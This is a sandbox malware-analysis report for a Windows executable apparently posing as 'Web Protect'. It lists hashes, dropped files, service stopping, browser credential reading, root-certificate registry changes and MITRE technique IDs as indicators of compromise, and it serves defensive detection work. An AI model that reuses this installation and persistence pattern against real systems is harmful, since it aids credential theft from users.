ebfc6ab7f9e6a2a8fa125b55ac06606162eee3d8f6558bf276ac1702f01d04cb

Analysis

max time kernel
151s
max time network
159s
platform
windows10-2004_x64
resource
win10v2004-20220812-en
resource tags

arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
submitted
25/11/2022, 11:22

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

ebfc6ab7f9e6a2a8fa125b55ac06606162eee3d8f6558bf276ac1702f01d04cb.exe
Size

6.1MB
MD5

298d1eb88a15c40d6d66f8b464ad2f6b
SHA1

55d34ce6c6205662904642029129ab63e8e99ee9
SHA256

ebfc6ab7f9e6a2a8fa125b55ac06606162eee3d8f6558bf276ac1702f01d04cb
SHA512

029f8eab529f11af739cb8380c1f1ee62ebdbf59e7daee95d25b920a50fe3b14283ced408cba72ff2ce3d90b811d581f3bf94a5bed9edb05b1e9bd865692bf0c
SSDEEP

98304:Gu+lqUdMYTF3htapMLtg4QwwQ7FL9z8XBlyKMqrTGEli/azGd2r1CMhtH6:GuCFdpF3htTLYwbz4ZTKkDD6

Score

8^/10

discovery evasion spyware stealer upx

Malware Config

Signatures

Executes dropped EXE 16 IoCs

pid	Process
1988	precollect.exe
1604	wget.exe
5016	postcollect.exe
1332	wget.exe
4108	wget.exe
3592	wget.exe
4496	monitor.exe
3028	RegisterMyOSProtect.exe
1120	RegisterMyOSProtect64.exe
3712	MyOSProtect.exe
2508	MyOSProtect.exe
4416	DirectControl.exe
2056	MyOSProtect.exe
680	wget.exe
3216	wget.exe
1188	wget.exe

Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489

UPX packed file 12 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/files/0x0006000000022e2b-145.dat	upx
behavioral2/files/0x0006000000022e2b-146.dat	upx
behavioral2/memory/1604-147-0x0000000000400000-0x00000000004EF000-memory.dmp	upx
behavioral2/files/0x0006000000022e2b-160.dat	upx
behavioral2/memory/1332-161-0x0000000000400000-0x00000000004EF000-memory.dmp	upx
behavioral2/files/0x0006000000022e2b-165.dat	upx
behavioral2/memory/4108-166-0x0000000000400000-0x00000000004EF000-memory.dmp	upx
behavioral2/files/0x0006000000022e2b-170.dat	upx
behavioral2/memory/3592-171-0x0000000000400000-0x00000000004EF000-memory.dmp	upx
behavioral2/memory/680-322-0x0000000000400000-0x00000000004EF000-memory.dmp	upx
behavioral2/memory/3216-324-0x0000000000400000-0x00000000004EF000-memory.dmp	upx
behavioral2/memory/1188-330-0x0000000000400000-0x00000000004EF000-memory.dmp	upx

Loads dropped DLL 64 IoCs

pid	Process
812	ebfc6ab7f9e6a2a8fa125b55ac06606162eee3d8f6558bf276ac1702f01d04cb.exe
1988	precollect.exe
1988	precollect.exe
1988	precollect.exe
1988	precollect.exe
1988	precollect.exe
1988	precollect.exe
1988	precollect.exe
1988	precollect.exe
812	ebfc6ab7f9e6a2a8fa125b55ac06606162eee3d8f6558bf276ac1702f01d04cb.exe
812	ebfc6ab7f9e6a2a8fa125b55ac06606162eee3d8f6558bf276ac1702f01d04cb.exe
812	ebfc6ab7f9e6a2a8fa125b55ac06606162eee3d8f6558bf276ac1702f01d04cb.exe
812	ebfc6ab7f9e6a2a8fa125b55ac06606162eee3d8f6558bf276ac1702f01d04cb.exe
812	ebfc6ab7f9e6a2a8fa125b55ac06606162eee3d8f6558bf276ac1702f01d04cb.exe
812	ebfc6ab7f9e6a2a8fa125b55ac06606162eee3d8f6558bf276ac1702f01d04cb.exe
812	ebfc6ab7f9e6a2a8fa125b55ac06606162eee3d8f6558bf276ac1702f01d04cb.exe
812	ebfc6ab7f9e6a2a8fa125b55ac06606162eee3d8f6558bf276ac1702f01d04cb.exe
812	ebfc6ab7f9e6a2a8fa125b55ac06606162eee3d8f6558bf276ac1702f01d04cb.exe
812	ebfc6ab7f9e6a2a8fa125b55ac06606162eee3d8f6558bf276ac1702f01d04cb.exe
812	ebfc6ab7f9e6a2a8fa125b55ac06606162eee3d8f6558bf276ac1702f01d04cb.exe
812	ebfc6ab7f9e6a2a8fa125b55ac06606162eee3d8f6558bf276ac1702f01d04cb.exe
812	ebfc6ab7f9e6a2a8fa125b55ac06606162eee3d8f6558bf276ac1702f01d04cb.exe
812	ebfc6ab7f9e6a2a8fa125b55ac06606162eee3d8f6558bf276ac1702f01d04cb.exe
812	ebfc6ab7f9e6a2a8fa125b55ac06606162eee3d8f6558bf276ac1702f01d04cb.exe
812	ebfc6ab7f9e6a2a8fa125b55ac06606162eee3d8f6558bf276ac1702f01d04cb.exe
812	ebfc6ab7f9e6a2a8fa125b55ac06606162eee3d8f6558bf276ac1702f01d04cb.exe
812	ebfc6ab7f9e6a2a8fa125b55ac06606162eee3d8f6558bf276ac1702f01d04cb.exe
812	ebfc6ab7f9e6a2a8fa125b55ac06606162eee3d8f6558bf276ac1702f01d04cb.exe
812	ebfc6ab7f9e6a2a8fa125b55ac06606162eee3d8f6558bf276ac1702f01d04cb.exe
812	ebfc6ab7f9e6a2a8fa125b55ac06606162eee3d8f6558bf276ac1702f01d04cb.exe
812	ebfc6ab7f9e6a2a8fa125b55ac06606162eee3d8f6558bf276ac1702f01d04cb.exe
812	ebfc6ab7f9e6a2a8fa125b55ac06606162eee3d8f6558bf276ac1702f01d04cb.exe
812	ebfc6ab7f9e6a2a8fa125b55ac06606162eee3d8f6558bf276ac1702f01d04cb.exe
812	ebfc6ab7f9e6a2a8fa125b55ac06606162eee3d8f6558bf276ac1702f01d04cb.exe
812	ebfc6ab7f9e6a2a8fa125b55ac06606162eee3d8f6558bf276ac1702f01d04cb.exe
812	ebfc6ab7f9e6a2a8fa125b55ac06606162eee3d8f6558bf276ac1702f01d04cb.exe
812	ebfc6ab7f9e6a2a8fa125b55ac06606162eee3d8f6558bf276ac1702f01d04cb.exe
812	ebfc6ab7f9e6a2a8fa125b55ac06606162eee3d8f6558bf276ac1702f01d04cb.exe
812	ebfc6ab7f9e6a2a8fa125b55ac06606162eee3d8f6558bf276ac1702f01d04cb.exe
812	ebfc6ab7f9e6a2a8fa125b55ac06606162eee3d8f6558bf276ac1702f01d04cb.exe
812	ebfc6ab7f9e6a2a8fa125b55ac06606162eee3d8f6558bf276ac1702f01d04cb.exe
812	ebfc6ab7f9e6a2a8fa125b55ac06606162eee3d8f6558bf276ac1702f01d04cb.exe
812	ebfc6ab7f9e6a2a8fa125b55ac06606162eee3d8f6558bf276ac1702f01d04cb.exe
812	ebfc6ab7f9e6a2a8fa125b55ac06606162eee3d8f6558bf276ac1702f01d04cb.exe
812	ebfc6ab7f9e6a2a8fa125b55ac06606162eee3d8f6558bf276ac1702f01d04cb.exe
812	ebfc6ab7f9e6a2a8fa125b55ac06606162eee3d8f6558bf276ac1702f01d04cb.exe
812	ebfc6ab7f9e6a2a8fa125b55ac06606162eee3d8f6558bf276ac1702f01d04cb.exe
812	ebfc6ab7f9e6a2a8fa125b55ac06606162eee3d8f6558bf276ac1702f01d04cb.exe
812	ebfc6ab7f9e6a2a8fa125b55ac06606162eee3d8f6558bf276ac1702f01d04cb.exe
812	ebfc6ab7f9e6a2a8fa125b55ac06606162eee3d8f6558bf276ac1702f01d04cb.exe
812	ebfc6ab7f9e6a2a8fa125b55ac06606162eee3d8f6558bf276ac1702f01d04cb.exe
812	ebfc6ab7f9e6a2a8fa125b55ac06606162eee3d8f6558bf276ac1702f01d04cb.exe
812	ebfc6ab7f9e6a2a8fa125b55ac06606162eee3d8f6558bf276ac1702f01d04cb.exe
812	ebfc6ab7f9e6a2a8fa125b55ac06606162eee3d8f6558bf276ac1702f01d04cb.exe
812	ebfc6ab7f9e6a2a8fa125b55ac06606162eee3d8f6558bf276ac1702f01d04cb.exe
812	ebfc6ab7f9e6a2a8fa125b55ac06606162eee3d8f6558bf276ac1702f01d04cb.exe
4496	monitor.exe
4496	monitor.exe
4496	monitor.exe
4496	monitor.exe
4496	monitor.exe
4496	monitor.exe
812	ebfc6ab7f9e6a2a8fa125b55ac06606162eee3d8f6558bf276ac1702f01d04cb.exe
812	ebfc6ab7f9e6a2a8fa125b55ac06606162eee3d8f6558bf276ac1702f01d04cb.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Drops file in System32 directory 10 IoCs

description	ioc	Process
File created	C:\Windows\SysWOW64\MyOSProtect.dll	RegisterMyOSProtect.exe
File created	C:\Windows\SysWOW64\MyOSProtect.ini	MyOSProtect.exe
File opened for modification	C:\Windows\SysWOW64\MyOSProtectOff.ini	MyOSProtect.exe
File opened for modification	C:\Windows\system32\MyOSProtectOff.ini	MyOSProtect.exe
File opened for modification	C:\Windows\SysWOW64\MyOSProtect.dll	RegisterMyOSProtect.exe
File created	C:\Windows\system32\MyOSProtect64.dll	RegisterMyOSProtect64.exe
File opened for modification	C:\Windows\system32\MyOSProtect64.dll	RegisterMyOSProtect64.exe
File created	C:\Windows\SysWOW64\MyOSProtectOff.ini	MyOSProtect.exe
File created	C:\Windows\system32\MyOSProtectOff.ini	MyOSProtect.exe
File opened for modification	C:\Windows\SysWOW64\MyOSProtect.ini	MyOSProtect.exe

Drops file in Program Files directory 52 IoCs

description	ioc	Process
File created	C:\Program Files (x86)\Web Protect\pcwatch.sys	ebfc6ab7f9e6a2a8fa125b55ac06606162eee3d8f6558bf276ac1702f01d04cb.exe
File created	C:\Program Files (x86)\Web Protect\smime3.dll	ebfc6ab7f9e6a2a8fa125b55ac06606162eee3d8f6558bf276ac1702f01d04cb.exe
File created	C:\Program Files (x86)\Web Protect\sqlite3.dll	ebfc6ab7f9e6a2a8fa125b55ac06606162eee3d8f6558bf276ac1702f01d04cb.exe
File created	C:\Program Files (x86)\Web Protect\wget.exe	ebfc6ab7f9e6a2a8fa125b55ac06606162eee3d8f6558bf276ac1702f01d04cb.exe
File created	C:\Program Files (x86)\Web Protect\precollect.exe	ebfc6ab7f9e6a2a8fa125b55ac06606162eee3d8f6558bf276ac1702f01d04cb.exe
File opened for modification	C:\Program Files (x86)\Web Protect\pcwatch.sys.win7	ebfc6ab7f9e6a2a8fa125b55ac06606162eee3d8f6558bf276ac1702f01d04cb.exe
File created	C:\Program Files (x86)\Web Protect\PCProxy.tlb	ebfc6ab7f9e6a2a8fa125b55ac06606162eee3d8f6558bf276ac1702f01d04cb.exe
File created	C:\Program Files (x86)\Web Protect\nss3.dll	ebfc6ab7f9e6a2a8fa125b55ac06606162eee3d8f6558bf276ac1702f01d04cb.exe
File opened for modification	C:\Program Files (x86)\Web Protect\status2.txt	ebfc6ab7f9e6a2a8fa125b55ac06606162eee3d8f6558bf276ac1702f01d04cb.exe
File opened for modification	C:\Program Files (x86)\Web Protect\status3.txt	ebfc6ab7f9e6a2a8fa125b55ac06606162eee3d8f6558bf276ac1702f01d04cb.exe
File created	C:\Program Files (x86)\Web Protect\uninstallhelper.exe	ebfc6ab7f9e6a2a8fa125b55ac06606162eee3d8f6558bf276ac1702f01d04cb.exe
File created	C:\Program Files (x86)\Web Protect\pcwtc64f.sys	ebfc6ab7f9e6a2a8fa125b55ac06606162eee3d8f6558bf276ac1702f01d04cb.exe
File opened for modification	C:\Program Files (x86)\Web Protect\RegisterMyOSProtect64.exe	ebfc6ab7f9e6a2a8fa125b55ac06606162eee3d8f6558bf276ac1702f01d04cb.exe
File created	C:\Program Files (x86)\Web Protect\libplc4.dll	ebfc6ab7f9e6a2a8fa125b55ac06606162eee3d8f6558bf276ac1702f01d04cb.exe
File opened for modification	C:\Program Files (x86)\Web Protect\RegisterMyOSProtect.exe	ebfc6ab7f9e6a2a8fa125b55ac06606162eee3d8f6558bf276ac1702f01d04cb.exe
File created	C:\Program Files (x86)\Web Protect\webprotect.ico	ebfc6ab7f9e6a2a8fa125b55ac06606162eee3d8f6558bf276ac1702f01d04cb.exe
File created	C:\Program Files (x86)\Web Protect\MyOSProtect64.dll	ebfc6ab7f9e6a2a8fa125b55ac06606162eee3d8f6558bf276ac1702f01d04cb.exe
File created	C:\Program Files (x86)\Web Protect\DirectControl.exe	ebfc6ab7f9e6a2a8fa125b55ac06606162eee3d8f6558bf276ac1702f01d04cb.exe
File created	C:\Program Files (x86)\Web Protect\PCProxyDLL.dll	ebfc6ab7f9e6a2a8fa125b55ac06606162eee3d8f6558bf276ac1702f01d04cb.exe
File created	C:\Program Files (x86)\Web Protect\tmpfile	wget.exe
File created	C:\Program Files (x86)\Web Protect\itime.txt	wget.exe
File opened for modification	C:\Program Files (x86)\Web Protect\DirectControl.exe	ebfc6ab7f9e6a2a8fa125b55ac06606162eee3d8f6558bf276ac1702f01d04cb.exe
File opened for modification	C:\Program Files (x86)\Web Protect\RegisterMyOSProtect.ini	ebfc6ab7f9e6a2a8fa125b55ac06606162eee3d8f6558bf276ac1702f01d04cb.exe
File created	C:\Program Files (x86)\Web Protect\status3.txt	wget.exe
File created	C:\Program Files (x86)\Web Protect\MyOSProtect.dll	ebfc6ab7f9e6a2a8fa125b55ac06606162eee3d8f6558bf276ac1702f01d04cb.exe
File created	C:\Program Files (x86)\Web Protect\libnspr4.dll	ebfc6ab7f9e6a2a8fa125b55ac06606162eee3d8f6558bf276ac1702f01d04cb.exe
File created	C:\Program Files (x86)\Web Protect\nssckbi.dll	ebfc6ab7f9e6a2a8fa125b55ac06606162eee3d8f6558bf276ac1702f01d04cb.exe
File created	C:\Program Files (x86)\Web Protect\pcwatch.sys.win7	ebfc6ab7f9e6a2a8fa125b55ac06606162eee3d8f6558bf276ac1702f01d04cb.exe
File created	C:\Program Files (x86)\Web Protect\pcwtc64r.sys	ebfc6ab7f9e6a2a8fa125b55ac06606162eee3d8f6558bf276ac1702f01d04cb.exe
File created	C:\Program Files (x86)\Web Protect\softokn3.dll	ebfc6ab7f9e6a2a8fa125b55ac06606162eee3d8f6558bf276ac1702f01d04cb.exe
File opened for modification	C:\Program Files (x86)\Web Protect\jsurl.txt	ebfc6ab7f9e6a2a8fa125b55ac06606162eee3d8f6558bf276ac1702f01d04cb.exe
File created	C:\Program Files (x86)\Web Protect\idate.txt	wget.exe
File created	C:\Program Files (x86)\Web Protect\RegisterMyOSProtect.ini	ebfc6ab7f9e6a2a8fa125b55ac06606162eee3d8f6558bf276ac1702f01d04cb.exe
File created	C:\Program Files (x86)\Web Protect\WDCertInstaller.dll	ebfc6ab7f9e6a2a8fa125b55ac06606162eee3d8f6558bf276ac1702f01d04cb.exe
File created	C:\Program Files (x86)\Web Protect\jsurl.txt	wget.exe
File opened for modification	C:\Program Files (x86)\Web Protect\itime.txt	ebfc6ab7f9e6a2a8fa125b55ac06606162eee3d8f6558bf276ac1702f01d04cb.exe
File opened for modification	C:\Program Files (x86)\Web Protect\pcwatch.sys	ebfc6ab7f9e6a2a8fa125b55ac06606162eee3d8f6558bf276ac1702f01d04cb.exe
File created	C:\Program Files (x86)\Web Protect\status2.txt	wget.exe
File opened for modification	C:\Program Files (x86)\Web Protect\tmpfile	postcollect.exe
File created	C:\Program Files (x86)\Web Protect\libplds4.dll	ebfc6ab7f9e6a2a8fa125b55ac06606162eee3d8f6558bf276ac1702f01d04cb.exe
File created	C:\Program Files (x86)\Web Protect\nssutil3.dll	ebfc6ab7f9e6a2a8fa125b55ac06606162eee3d8f6558bf276ac1702f01d04cb.exe
File created	C:\Program Files (x86)\Web Protect\RegisterMyOSProtect.exe	ebfc6ab7f9e6a2a8fa125b55ac06606162eee3d8f6558bf276ac1702f01d04cb.exe
File created	C:\Program Files (x86)\Web Protect\RegisterMyOSProtect64.exe	ebfc6ab7f9e6a2a8fa125b55ac06606162eee3d8f6558bf276ac1702f01d04cb.exe
File created	C:\Program Files (x86)\Web Protect\freebl3.dll	ebfc6ab7f9e6a2a8fa125b55ac06606162eee3d8f6558bf276ac1702f01d04cb.exe
File created	C:\Program Files (x86)\Web Protect\nssdbm3.dll	ebfc6ab7f9e6a2a8fa125b55ac06606162eee3d8f6558bf276ac1702f01d04cb.exe
File created	C:\Program Files (x86)\Web Protect\ssl3.dll	ebfc6ab7f9e6a2a8fa125b55ac06606162eee3d8f6558bf276ac1702f01d04cb.exe
File opened for modification	C:\Program Files (x86)\Web Protect\tmpfile	precollect.exe
File created	C:\Program Files (x86)\Web Protect\MyOSProtect.exe	ebfc6ab7f9e6a2a8fa125b55ac06606162eee3d8f6558bf276ac1702f01d04cb.exe
File created	C:\Program Files (x86)\Web Protect\MyOSProtect.tlb	ebfc6ab7f9e6a2a8fa125b55ac06606162eee3d8f6558bf276ac1702f01d04cb.exe
File created	C:\Program Files (x86)\Web Protect\tmpfile	wget.exe
File created	C:\Program Files (x86)\Web Protect\postcollect.exe	ebfc6ab7f9e6a2a8fa125b55ac06606162eee3d8f6558bf276ac1702f01d04cb.exe
File opened for modification	C:\Program Files (x86)\Web Protect\idate.txt	ebfc6ab7f9e6a2a8fa125b55ac06606162eee3d8f6558bf276ac1702f01d04cb.exe

Launches sc.exe 4 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
212	sc.exe
3228	sc.exe
3436	sc.exe
1552	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

NSIS installer 10 IoCs

installer

resource	yara_rule
behavioral2/files/0x0006000000022e2c-134.dat	nsis_installer_1
behavioral2/files/0x0006000000022e2c-134.dat	nsis_installer_2
behavioral2/files/0x0006000000022e2c-135.dat	nsis_installer_1
behavioral2/files/0x0006000000022e2c-135.dat	nsis_installer_2
behavioral2/files/0x0007000000022e30-152.dat	nsis_installer_1
behavioral2/files/0x0007000000022e30-152.dat	nsis_installer_2
behavioral2/files/0x0007000000022e30-155.dat	nsis_installer_1
behavioral2/files/0x0007000000022e30-155.dat	nsis_installer_2
behavioral2/files/0x0007000000022e33-191.dat	nsis_installer_1
behavioral2/files/0x0007000000022e33-191.dat	nsis_installer_2

Gathers system information 1 TTPs 2 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
4952	systeminfo.exe
4596	systeminfo.exe

Modifies data under HKEY_USERS 8 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	MyOSProtect.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	MyOSProtect.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	MyOSProtect.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\ROOT	MyOSProtect.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	MyOSProtect.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	MyOSProtect.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	MyOSProtect.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\ROOT	MyOSProtect.exe

Modifies registry class 64 IoCs

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{C64747EF-5093-48B3-A876-579B3A529C27}	MyOSProtect.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{DA5534ED-88FD-49fa-9D2D-B92584CB21AC}\LocalServer32	MyOSProtect.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{2D9DB233-DC4B-4677-946C-5FA5ABCF506B}\TypeLib\Version = "1.0"	MyOSProtect.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{E3F16E3B-4C44-445B-8854-EB76DC059891}\TypeLib\ = "{3E4048A7-8F44-48DC-9163-16A4803F7826}"	MyOSProtect.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{1A2A195A-A0F9-4006-AF02-3F05EEFDE792}\TypeLib	MyOSProtect.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\MyOSProtectLib.LSPLogic	MyOSProtect.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{6DA234CD-4043-46C6-922F-A39529AE3D4B}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}"	MyOSProtect.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\MyOSProtectLib.DataTableHolder\CLSID\ = "{E3F32F05-71B6-44c5-8BEE-13D239E27E98}"	MyOSProtect.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\MyOSProtectLib.DataTableFields\CLSID\ = "{533403E2-6E21-4615-9E28-43F4E97E977B}"	MyOSProtect.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{632ACF93-7DAA-4CFD-8BB5-9DCBB9116176}\TypeLib\ = "{3E4048A7-8F44-48DC-9163-16A4803F7826}"	MyOSProtect.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{4C0A69B0-CE97-42B7-86FC-08280C99C74D}\ = "IWFPController"	MyOSProtect.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{533403E2-6E21-4615-9E28-43F4E97E977B}	MyOSProtect.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{632ACF93-7DAA-4CFD-8BB5-9DCBB9116176}\TypeLib\Version = "1.0"	MyOSProtect.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{4C0A69B0-CE97-42B7-86FC-08280C99C74D}	MyOSProtect.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{0FCE4F01-64EC-42F1-83E1-1E08D38605D2}\TypeLib\ = "{3E4048A7-8F44-48DC-9163-16A4803F7826}"	MyOSProtect.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{4E9EB4D5-C929-4005-AC62-1856B1DA5A24}\TypeLib\ = "{3E4048A7-8F44-48DC-9163-16A4803F7826}"	MyOSProtect.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{6DA234CD-4043-46C6-922F-A39529AE3D4B}\ProxyStubClsid32	MyOSProtect.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{C64747EF-5093-48B3-A876-579B3A529C27}\ = "IProxyChecks"	MyOSProtect.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\MyOSProtectLib.ReadOnlyManager\CurVer	MyOSProtect.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{0C27B569-9410-406B-BA79-3EF654739236}	MyOSProtect.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{C64747EF-5093-48B3-A876-579B3A529C27}\TypeLib\Version = "1.0"	MyOSProtect.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{06FD4518-2CAB-4473-AA8D-0508134C6C1F}\VersionIndependentProgID\ = "MyOSProtectLib.ReadOnlyManager"	MyOSProtect.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{8FAF962C-3EDE-405E-B1D0-62B8235C6044}\ = "IInjector"	MyOSProtect.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{4C0A69B0-CE97-42B7-86FC-08280C99C74D}\TypeLib\Version = "1.0"	MyOSProtect.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\MyOSProtectLib.DataController\CurVer	MyOSProtect.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{6DA234CD-4043-46C6-922F-A39529AE3D4B}	MyOSProtect.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{6DA234CD-4043-46C6-922F-A39529AE3D4B}	MyOSProtect.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\MyOSProtectLib.DataContainer\CLSID	MyOSProtect.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\MyOSProtectLib.ReadOnlyManager.1\CLSID\ = "{06FD4518-2CAB-4473-AA8D-0508134C6C1F}"	MyOSProtect.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\MyOSProtectLib.DataTableFields\ = "DataTableFields Class"	MyOSProtect.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\MyOSProtectLib.WatchDog.1\CLSID\ = "{59A8D713-E25C-4c3f-AB27-44A4FEDD9328}"	MyOSProtect.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{704C6F87-E9C5-44FE-B5AF-A84DB18AFB54}	MyOSProtect.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{704C6F87-E9C5-44FE-B5AF-A84DB18AFB54}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}"	MyOSProtect.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{DA5534ED-88FD-49fa-9D2D-B92584CB21AC}\TypeLib\ = "{3E4048A7-8F44-48dc-9163-16A4803F7826}"	MyOSProtect.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{2F101D36-9749-4730-AA02-F1F8BD1193EA}\ = "DataContainer Class"	MyOSProtect.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{2F101D36-9749-4730-AA02-F1F8BD1193EA}\LocalServer32\ = "\"C:\\Program Files (x86)\\Web Protect\\MyOSProtect.exe\""	MyOSProtect.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{94B83936-77EA-4708-8FC5-F3BBC55C2A32}\ProgID	MyOSProtect.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{8FAF962C-3EDE-405E-B1D0-62B8235C6044}	MyOSProtect.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{2F101D36-9749-4730-AA02-F1F8BD1193EA}\LocalServer32	MyOSProtect.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\MyOSProtectLib.ReadOnlyManager.1	MyOSProtect.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{E3F16E3B-4C44-445B-8854-EB76DC059891}\ = "IDataTable"	MyOSProtect.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{0C27B569-9410-406B-BA79-3EF654739236}\TypeLib\ = "{3E4048A7-8F44-48DC-9163-16A4803F7826}"	MyOSProtect.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{E3F32F05-71B6-44c5-8BEE-13D239E27E98}\ProgID\ = "MyOSProtectLib.DataTableHolder.1"	MyOSProtect.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{4E9EB4D5-C929-4005-AC62-1856B1DA5A24}	MyOSProtect.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{0FCE4F01-64EC-42F1-83E1-1E08D38605D2}	MyOSProtect.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{E3F32F05-71B6-44c5-8BEE-13D239E27E98}\Programmable	MyOSProtect.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\MyOSProtectLib.LSPLogic\CLSID	MyOSProtect.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{94B83936-77EA-4708-8FC5-F3BBC55C2A32}\LocalServer32\ = "\"C:\\Program Files (x86)\\Web Protect\\MyOSProtect.exe\""	MyOSProtect.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{2D9DB233-DC4B-4677-946C-5FA5ABCF506B}\TypeLib\ = "{3E4048A7-8F44-48DC-9163-16A4803F7826}"	MyOSProtect.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{C64747EF-5093-48B3-A876-579B3A529C27}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}"	MyOSProtect.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{8FAF962C-3EDE-405E-B1D0-62B8235C6044}\TypeLib\Version = "1.0"	MyOSProtect.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{4E9EB4D5-C929-4005-AC62-1856B1DA5A24}\ = "IChatControl"	MyOSProtect.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{8FAF962C-3EDE-405E-B1D0-62B8235C6044}\TypeLib\ = "{3E4048A7-8F44-48DC-9163-16A4803F7826}"	MyOSProtect.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{704C6F87-E9C5-44FE-B5AF-A84DB18AFB54}\TypeLib\Version = "1.0"	MyOSProtect.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{0FCE4F01-64EC-42F1-83E1-1E08D38605D2}\TypeLib\Version = "1.0"	MyOSProtect.exe
